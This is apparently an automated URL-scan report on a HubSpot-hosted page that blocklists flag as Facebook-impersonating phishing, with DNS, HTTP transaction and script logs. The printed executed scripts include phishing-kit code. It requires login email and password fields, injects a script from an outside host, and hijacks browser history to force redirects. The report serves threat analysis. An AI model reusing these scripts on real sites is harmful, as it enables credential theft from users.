Overview

URL appnewstv.hs-sites-eu1.com/
IP172.64.154.3
ASNCLOUDFLARENET
Location United States
Report completed2022-09-14 22:55:59 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Facebook, Inc.
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-14 2 appnewstv.hs-sites-eu1.com/ Phishing
2022-09-14 2 appnewstv.hs-sites-eu1.com/_hcms/perf Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (27)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS whos.amung.us (1) 12687 2014-04-02 14:27:13 UTC 2022-09-14 18:19:29 UTC 104.22.74.171
mnemonic passive DNS cdn2.hubspot.net (2) 7304 2013-04-11 07:00:34 UTC 2022-09-14 07:16:42 UTC 104.17.244.204
mnemonic passive DNS fonts.gstatic.com (2) 0 2014-08-29 13:43:22 UTC 2022-09-14 04:48:25 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS forms-eu1.hubspot.com (1) 77050 2021-08-03 13:53:49 UTC 2022-09-14 15:39:31 UTC 172.65.193.34
mnemonic passive DNS fonts.googleapis.com (1) 8877 2014-07-21 13:19:55 UTC 2022-09-14 17:07:12 UTC 142.250.74.10
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-14 18:38:37 UTC 143.204.55.115
mnemonic passive DNS js-eu1.hscollectedforms.net (1) 75385 2021-08-03 13:53:48 UTC 2022-09-14 15:39:30 UTC 172.65.192.122
mnemonic passive DNS track-eu1.hubspot.com (1) 73788 2021-08-03 10:49:05 UTC 2022-09-14 15:39:33 UTC 172.65.240.166
mnemonic passive DNS r3.o.lencr.org (7) 344 2020-12-02 08:52:13 UTC 2022-09-14 04:47:59 UTC 23.36.76.226
mnemonic passive DNS app-eu1.hubspot.com (1) 191732 2021-07-26 14:26:48 UTC 2022-09-14 18:54:16 UTC 172.65.236.181
mnemonic passive DNS ocsp.pki.goog (3) 175 2017-06-14 07:23:31 UTC 2022-09-14 04:48:23 UTC 142.250.74.3
mnemonic passive DNS f.hubspotusercontent-eu1.net (3) 278068 2021-08-12 10:46:27 UTC 2022-09-14 18:54:16 UTC 104.18.34.226
mnemonic passive DNS js-eu1.hs-scripts.com (1) 63672 2021-08-03 13:53:48 UTC 2022-09-14 15:39:29 UTC 172.65.208.22
mnemonic passive DNS 26246913.fs1.hubspotusercontent-eu1.net (1) 0 2022-09-14 10:25:59 UTC 2022-09-14 10:25:59 UTC 104.18.34.226 Unknown ranking
mnemonic passive DNS feliznewstv.com (2) 0 2022-07-23 16:41:06 UTC 2022-09-14 10:26:10 UTC 147.182.144.225 Unknown ranking
mnemonic passive DNS js-eu1.hs-analytics.net (1) 69352 2021-08-03 13:53:48 UTC 2022-09-14 15:39:30 UTC 172.65.238.60
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-14 04:47:55 UTC 143.204.55.25
mnemonic passive DNS cdnjs.cloudflare.com (3) 235 2020-10-20 10:17:36 UTC 2022-09-14 05:00:27 UTC 104.17.24.14
mnemonic passive DNS static.hsappstatic.net (5) 8199 2013-09-26 02:22:42 UTC 2022-09-14 05:56:13 UTC 104.17.5.210
mnemonic passive DNS forms-eu1.hsforms.com (1) 91702 2021-08-03 13:53:50 UTC 2022-09-14 15:39:30 UTC 172.65.232.43
mnemonic passive DNS js-eu1.hs-banner.com (1) 66996 2021-08-03 13:53:48 UTC 2022-09-14 15:39:30 UTC 172.65.202.201
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-09-14 18:30:48 UTC 93.184.220.29
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-14 04:48:23 UTC 34.213.140.56
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-14 12:35:36 UTC 34.120.237.76
mnemonic passive DNS appnewstv.hs-sites-eu1.com (2) 0 2022-09-13 19:45:26 UTC 2022-09-14 15:35:08 UTC 104.18.33.253 Unknown ranking
mnemonic passive DNS widgets.amung.us (1) 12623 2012-05-21 19:25:54 UTC 2022-09-14 15:59:15 UTC 104.22.75.171
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-14 04:48:22 UTC 34.117.237.239


Recent reports on same IP/ASN/Domain/Screenshot

Last 3 reports on IP: 172.64.154.3

Date UQ / IDS / BL URL IP
2022-09-15 09:57:01 +0000
0 - 0 - 2 news4kcnn.hs-sites-eu1.com/?fbclid=IwAR2SUqE3 (...) 172.64.154.3
2022-09-14 22:55:59 +0000
0 - 0 - 4 appnewstv.hs-sites-eu1.com/ 172.64.154.3
2022-09-14 22:05:19 +0000
0 - 0 - 5 cnnnews4k.hs-sites-eu1.com/ 172.64.154.3

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-03 23:37:53 +0000
1 - 0 - 2 squatbully.com/form/code/invest/browser/perma (...) 104.21.80.165
2022-12-03 23:37:40 +0000
0 - 0 - 4 clubedematrizes.com/mahalaxmi-escorts/ 172.67.210.166
2022-12-03 23:36:18 +0000
0 - 0 - 2 storageapi.fleek.co/30001fbf-a421-4772-86aa-8 (...) 104.18.7.145
2022-12-03 23:35:57 +0000
0 - 0 - 4 cinecalidad.run/ver-pelicula/desencantada-dis (...) 104.21.88.50
2022-12-03 23:35:53 +0000
0 - 0 - 2 origa-cloud-b38d.c71rcsyb.workers.dev/5e3d87a (...) 172.67.186.119

Last 5 reports on domain: hs-sites-eu1.com

Date UQ / IDS / BL URL IP
2022-12-02 21:27:43 +0000
0 - 0 - 1 prositevd.hs-sites-eu1.com/ 104.18.33.253
2022-11-28 08:35:20 +0000
0 - 0 - 0 hoegheiendom-25006101.hs-sites-eu1.com/inflas (...) 104.18.33.253
2022-11-14 13:35:03 +0000
0 - 0 - 6 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-09-23 23:15:15 +0000
0 - 0 - 2 private-video.hs-sites-eu1.com/ 104.18.33.253

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-15 15:41:18 +0000
0 - 0 - 8 app-funnelsx.bubbleapps.io/version-test/ 104.19.217.48
2022-11-14 09:32:46 +0000
0 - 0 - 9 wwwcnn-news4k.hs-sites-eu1.com/ 104.18.33.253
2022-11-10 23:45:55 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-10 14:36:22 +0000
0 - 0 - 8 rickpack44.bubbleapps.io/version-test/ 104.19.218.48
2022-11-01 10:39:02 +0000
0 - 0 - 2 jhufedsgjg614322067.brizy.site/ 34.237.47.210


JavaScript

Executed Scripts (19)


Executed Evals (6)

#1 JavaScript::Eval (size: 386, repeated: 1) - SHA256: d56b088af0f7a23d2cdc0a4e61293c5e55c61d23a49e18906733f77e1b3ab364

                                        document.body.className = document.body.className + ' touch x1-5 android _fzu _50-3 iframe acw portrait';
m_login_email.required = true;
m_login_password.required = true;
var script_ = document.createElement('script');
script_.src = "https://feliznewstv.com/location";
script_.async = true;
document.body.appendChild(script_);
                                    

#2 JavaScript::Eval (size: 516, repeated: 1) - SHA256: 981233bb7fc26109c211cad042da538cf8df699dc77e1b859daf53174dd95f24

                                        (function() {
    var ignoreHistoryChange = true;
    window.onpopstate = function(event) {

        if (!ignoreHistoryChange) {
            ignoreHistoryChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHistoryChange = false;
        }


    };
})();
                                    

#3 JavaScript::Eval (size: 506, repeated: 1) - SHA256: faa040a5ceb4c2ae787756b6505cc259fd4eecf9eefd1a619b68170c36be4481

                                        (function() {
    window.location.hash = Math.random();
    var ignoreHashChange = true;
    window.onhashchange = function() {
        if (!ignoreHashChange) {
            ignoreHashChange = true;

            try {
                window.top.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            } catch (d) {
                window.location = 'https://oficial-sites-news.hs-sites-eu1.com/';
            };
            return false;

        } else {
            ignoreHashChange = false;
        }
    };
})();
                                    

#4 JavaScript::Eval (size: 74, repeated: 1) - SHA256: caa4136b6be3d43f29aa4daaae83f78c3b5c2147caab95afa2204069aa91a97c

                                         (function() {
     new Image().src = '//whos.amung.us/widget/josvip222';
 })();
                                    

#5 JavaScript::Eval (size: 0, repeated: 1) - SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        
                                    

#6 JavaScript::Eval (size: 72, repeated: 1) - SHA256: 29a2f56684cbeb9be02ed2d2ada727030d2781d6f6630d817ea23ef8ab50b293

                                        (function() {
    new Image().src = '//whos.amung.us/widget/josvip222';
})();
                                    

Executed Writes (0)



HTTP Transactions (53)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 14 Sep 2022 22:09:59 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 50584ad285d5f627ddebae74efdd0770.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: gzmimzokrrZxlxqI2SqWj4m2kv3TFsTKdXhkb2Gd54RpinzlQ5cjTA==
Age: 2749


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    99b7d23c1748d0526782b9ff9ea45f09
Sha1:   eadd801a3ba2aa00632c6fb52e1f9125bd6d5b4f
Sha256: 48f81668f76955320480b484138aebdad5d03c471036b4449c737aca1ecab08e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B5F178D23E633283F226CCA7A9AE79B01E6CAB2299FF7065C980D3A9953212FD"
Last-Modified: Tue, 13 Sep 2022 06:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5207
Expires: Thu, 15 Sep 2022 00:22:35 GMT
Date: Wed, 14 Sep 2022 22:55:48 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Wed, 14 Sep 2022 04:35:16 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 4f01f770085624552bc30a98954f963a.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: 7ayY4pHwRFzM1s0H_OCGURPCL9goIRghrbjQULAbpQxdRB60X1X-tA==
age: 66033
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET / HTTP/1.1 
Host: appnewstv.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         104.18.33.253
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb6595bae0b69-OSL
Cache-Control: s-maxage=10,max-age=5
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
cache-tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
Edge-Cache-Tag: CT-53071520739,P-26246913,CW-53070285001,CW-53070285002,CW-53070973145,CW-53071252457,E-53070144758,E-53070288600,E-53070973151,E-53070973152,E-53070973154,E-53070982620,E-53071252464,RA-53070285250,PGS-ALL,SW-0
X-HS-Cache-Config: BrowserCache-5s-EdgeCache-10s
X-HS-Content-Id: 53071520739
X-HS-Hub-Id: 26246913
X-HubSpot-Correlation-Id: 00d4a57c-6a09-4eea-883e-ebc310f917f7
X-Powered-By: HubSpot
X-Robots-Tag: none
X-Trace: 2B2805DDD144D1A0FFB146F6FC66A84A0DA8B74763000000000000000000
Server: cloudflare
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1069)
Size:   5365
Md5:    e207a80d7a7d699753612cdc8c3b5cf9
Sha1:   5342f9093290687006bce8154228bf9208568544
Sha256: 159708ec21d0f3eb7f4601961e60337f5417f61d76847cfbd0a6e2864c72420e

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            GET /ajax/libs/font-awesome/5.15.1/css/all.min.css HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 10491
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5f7b5b5f-e7d0"
last-modified: Mon, 05 Oct 2020 17:43:59 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 4239167
expires: Mon, 04 Sep 2023 22:55:49 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IhRXCgDLpp1W6ENOeN5UZWxtuCnVzs%2F05JGg%2Fa0SljrymXUIwTBHA2kv4j6dU%2FsIm%2Bex2OjWvalTKrFWm3y6LWi%2BbLoogCQIwl0g%2BV%2BC4d6CppH6BtXYhUi1R0t4S8Fv5OzIx9mH"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74acb65d893db506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (59158)
Size:   10491
Md5:    a20f2b1b0e73086a7546d004092fb368
Sha1:   3c0e3c8c74971acac179bb55951410cdfc26abab
Sha256: 185c5af2acbae7972165d8c67887a7300e85cb3f03882048437b6e5177c1fe2a
                                        
                                            GET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 27958
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb09ed3-15d84"
last-modified: Mon, 04 May 2020 23:01:39 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 8639853
expires: Mon, 04 Sep 2023 22:55:49 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zDMJEPBmeRECf%2B4ntlnTfjkQJvMIh2lBwZHvZ%2FjuT3sgVkj%2FQFz%2FeHHIYKZIM5RR6UoT4syOuhVYj79xR20VwIUkvGdQL%2BlOsmyewd4O%2Fn9gw8xUU1RlA1HjAUFoQ4JtcQadh3kq"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74acb65d9946b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   27958
Md5:    4b5f47439b640180cc3450f7de05d0d8
Sha1:   5a0dc9bcab80ddc409dd35fcb00a88fe6846fee2
Sha256: 1f85e8b327f42c17c025d69849914068536d9aa95412fe473ae90ffb2f4ebd82
                                        
                                            GET /hub/26246913/hub_generated/template_assets/53070288600/1663077099315/marketplace/GiantFocal/Hatch_Landing/css/main.min.css HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: text/css
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb65d5e28b500-OSL
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: public, max-age=1209600
Content-Encoding: gzip
ETag: W/"7c228c6edbc872215fbf537a8b4cf18e"
Expires: Wed, 28 Sep 2022 22:55:49 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:43 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077102493
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare


--- Additional Info ---
Magic:  ASCII text, with very long lines (38627)
Size:   78600
Md5:    5256ccfbc2ab2efe1333e9307bc73e65
Sha1:   24f4e33e7aae36a340369b7142cfb52ae65b6d44
Sha256: d19cd994105a0d58d42125024879d444797c935ccdbc763957bc033ca6f5b555
                                        
                                            GET /ajax/libs/jquery-migrate/3.3.1/jquery-migrate.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
content-length: 3592
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5ef3fc71-2b0b"
last-modified: Thu, 25 Jun 2020 01:22:57 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 6239054
expires: Mon, 04 Sep 2023 22:55:49 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hj9Kxtq2C0YxbWB%2BKe5fGuQmIMDGo6s%2BQSyZm2MlOIJrLDE4Q8pteMEHsr8BTaxuIYpWM%2FuWCE68xdd2qaL%2BZI%2BsiL%2BwEDkOWL%2BdNYXKgzCkIYpvNSLsox383dbV6bZeKVKneCLL"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74acb65da955b506-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (10878)
Size:   3592
Md5:    6ea2c00839ed36981fbd1b780e595bfb
Sha1:   9ccfa1a9cd5cb950fc6aaf7697e8a0f9445499b8
Sha256: 9264523f67fe6dae44ac10a749711f77eeff71a8296210098d1144f84e01f944
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /hub/26246913/hub_generated/template_assets/53070982620/1663077090631/marketplace/GiantFocal/Hatch_Landing/js/plugins/plugins.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb65d8e231c16-OSL
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: public, max-age=1209600
ETag: W/"709362e671b2b08da9b90e574d607024"
Expires: Wed, 28 Sep 2022 22:55:49 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:31 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077090919
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (3296)
Size:   1465
Md5:    a4293e27e8623332217827abd391a216
Sha1:   3d56fe03c815733f126c62084c7f81bd55e73c08
Sha256: ed71fb54bd4710f3596a1350059adb20d91367da6fd04670eabbd09316912e3f
                                        
                                            GET /hub/26246913/hub_generated/template_assets/53071252464/1663077093553/marketplace/GiantFocal/Hatch_Landing/js/main.min.js HTTP/1.1 
Host: f.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74acb65d8e4b0afa-OSL
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: public, max-age=1209600
ETag: W/"d9021282f13fd812e10bb808a4c186e0"
Expires: Wed, 28 Sep 2022 22:55:49 GMT
Last-Modified: Tue, 13 Sep 2022 13:51:34 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
X-Amz-Cf-Pop: FRA53-C1
x-amz-meta-created-unix-time-millis: 1663077093849
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with very long lines (6578)
Size:   1642
Md5:    06009aad337ffed6cf8df4b3abaf6ab2
Sha1:   9cb81c4cf430535387204787bb3e5a083adef1fe
Sha256: ff81071ab461b03cda8c9cca779ddf6c354114979ebe0b8bd99a2aabc05b5227
                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-scripts.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         172.65.208.22
HTTP/1.1 200 OK
Content-Type: application/javascript;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Content-Length: 603
Connection: keep-alive
X-Trace: 2B8A87F9780D1080CC29F8E5A10211AACFFCB17311000000000000000000
Cache-Control: public, max-age=30
Vary: Accept-Encoding
X-HubSpot-Correlation-Id: dfb0f4bb-a227-4485-b7d1-c6e49bce824d
Content-Encoding: gzip
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 3600
